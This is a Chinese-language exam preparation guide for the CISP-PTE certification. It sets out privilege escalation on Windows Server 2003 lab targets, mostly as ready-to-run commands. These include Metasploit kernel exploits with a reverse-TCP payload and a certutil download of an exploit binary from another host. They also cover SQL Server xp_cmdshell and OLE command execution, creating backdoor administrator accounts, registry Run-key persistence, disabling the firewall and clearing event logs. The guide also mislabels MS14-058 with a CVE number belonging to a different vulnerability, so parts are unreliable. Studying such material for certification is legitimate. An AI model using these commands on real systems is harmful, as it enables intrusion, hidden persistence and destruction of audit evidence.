CISP-PTE考试必备：Windows 2003靶机常见提权漏洞利用指南

CISP-PTE考试实战：Windows Server 2003提权漏洞深度解析与靶机攻防

Windows Server 2003作为经典的操作系统版本，在CISP-PTE认证考试中仍然是重点考察对象。对于备考人员而言，掌握该系统下的提权技术不仅是通过考试的关键，更是理解Windows安全机制的重要途径。本文将系统梳理Windows 2003环境下最常见的提权漏洞利用链，从信息收集到权限维持，提供一套完整的实战方法论。

1. 环境准备与信息收集

在开始漏洞利用前，充分的信息收集是成功提权的基础。针对Windows Server 2003靶机，我们需要建立系统化的侦察流程。

基础网络侦察通常从端口扫描开始：

nmap -sV -O -p- 192.168.1.100

典型Windows Server 2003开放端口包括：

• 135/tcp (RPC)
• 139/tcp (NetBIOS)
• 445/tcp (SMB)
• 3389/tcp (RDP，可能被防火墙阻止)

系统信息收集可以通过以下命令实现：

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" net config Workstation net user net localgroup administrators

对于数据库服务的侦察，如果发现1433端口开放，可以使用SQL Server Management Studio进行连接测试。常见的弱口令组合包括：

提示：在考试环境中，数据库往往是提权的重要跳板，务必仔细检查所有可能的凭证存储位置，如web配置文件、注册表等。

2. 常见提权漏洞利用分析

Windows Server 2003存在多个已被公开的本地提权漏洞，这些漏洞在CISP-PTE考试中出现的频率极高。我们重点分析三个最具代表性的漏洞。

2.1 MS14-058漏洞利用

MS14-058（CVE-2014-4114）影响Windows内核模式驱动程序，允许攻击者从普通用户权限提升至SYSTEM权限。

利用步骤：

1. 在Metasploit中加载模块：

   use exploit/windows/local/ms14_058_track_popup_menu set SESSION <已获得的meterpreter会话> exploit

2. 验证漏洞存在：
   • 检查系统补丁状态
   • 使用check命令确认靶机是否易受攻击

技术原理： 该漏洞源于内核态对用户态传入的菜单对象处理不当，导致内存破坏。攻击者可以精心构造一个弹出菜单对象，通过TrackPopupMenuEx函数触发漏洞，最终实现任意代码执行。

2.2 MS15-051漏洞利用

MS15-051（CVE-2015-1701）是Windows内核中的另一个经典提权漏洞，利用成功率较高。

操作流程：

1. 上传编译好的利用程序：

   upload /usr/share/windows-binaries/ms15-051/ms15-051.exe C:\\Windows\\Temp\\

2. 执行提权：

   C:\\Windows\\Temp\\ms15-051.exe "whoami"

关键点分析：

• 漏洞源于Windows内核对象管理器中的竞争条件
• 利用程序会创建一个特定类型的对象，然后通过精心设计的系统调用触发漏洞
• 成功利用后可以执行任意命令，通常用于添加管理员账户或开启远程桌面

2.3 MS10-015漏洞利用

虽然发布时间较早，但MS10-015（CVE-2010-0232）在未打补丁的Windows 2003系统上仍然有效。

Metasploit利用：

use exploit/windows/local/ms10_015_kitrap0d set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <攻击机IP> set SESSION <现有会话> exploit

注意事项：

• 该漏洞可能导致系统蓝屏崩溃
• 建议在考试环境中先在其他靶机测试
• 成功率与系统具体配置密切相关

3. 数据库辅助提权技术

当直接系统提权受阻时，数据库服务往往能提供额外的攻击面。特别是SQL Server服务，可以通过多种方式协助提权。

3.1 xp_cmdshell的启用与利用

如果获得sa权限，启用xp_cmdshell是常见手法：

-- 启用高级选项 EXEC sp_configure 'show advanced options', 1; RECONFIGURE; -- 启用xp_cmdshell EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- 执行系统命令 EXEC master.dbo.xp_cmdshell 'whoami';

3.2 数据库链接攻击

当无法直接获得sa权限时，可以尝试数据库链接攻击：

1. 查找可用的链接服务器：

   SELECT * FROM sys.servers;

2. 利用链接服务器执行命令：

   EXEC('sp_configure ''show advanced options'',1;RECONFIGURE;') AT [链接服务器名]

3.3 存储过程滥用

许多SQL Server内置存储过程可以被滥用：

-- 添加用户 EXEC sp_addlogin 'hacker', 'Password123!'; EXEC sp_addsrvrolemember 'hacker', 'sysadmin'; -- 通过OLE自动化执行命令 DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c net user hacker Password123! /add'

4. 权限维持与后渗透技巧

获得管理员权限后，如何在考试环境中维持访问是需要掌握的关键技能。

4.1 持久化方法对比

4.2 远程桌面配置技巧

当防火墙阻止3389端口时，可以尝试以下方法：

1. 修改注册表更改RDP端口：

   REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

2. 通过端口转发访问：

   netsh interface portproxy add v4tov4 listenport=3390 connectport=3389 connectaddress=127.0.0.1

4.3 日志清理与痕迹消除

考试中可能需要清除攻击痕迹：

wevtutil cl Security wevtutil cl System del /F /Q %WINDIR%\*.log

注意：在实际考试中，是否清理日志应根据题目要求决定，有些考试环境会检查日志完整性作为评分标准。

5. 综合实战案例演练

让我们通过一个典型考试场景整合前面学到的技术。假设我们已获得一个普通用户shell，系统为Windows Server 2003 SP2。

步骤1：系统信息收集

systeminfo | find "OS Version" wmic qfe list brief

发现系统未安装MS15-051补丁。

步骤2：上传并执行提权利用程序

certutil -urlcache -split -f http://192.168.1.50/ms15-051.exe ms15-051.exe ms15-051.exe "net user hacker P@ssw0rd /add & net localgroup administrators hacker /add"

步骤3：建立持久化访问

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Maintenance" /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start /min C:\Windows\Temp\backdoor.exe" /f

步骤4：横向移动准备

netsh firewall set opmode disable net use \\192.168.1.101\C$ /user:hacker P@ssw0rd

在实际考试环境中，每个步骤都可能遇到各种限制和防护措施。重要的是保持清晰的思路，灵活组合各种技术手段。记住，Windows Server 2003的提权路径通常不止一条，当一种方法失败时，及时尝试替代方案是考试中的关键策略。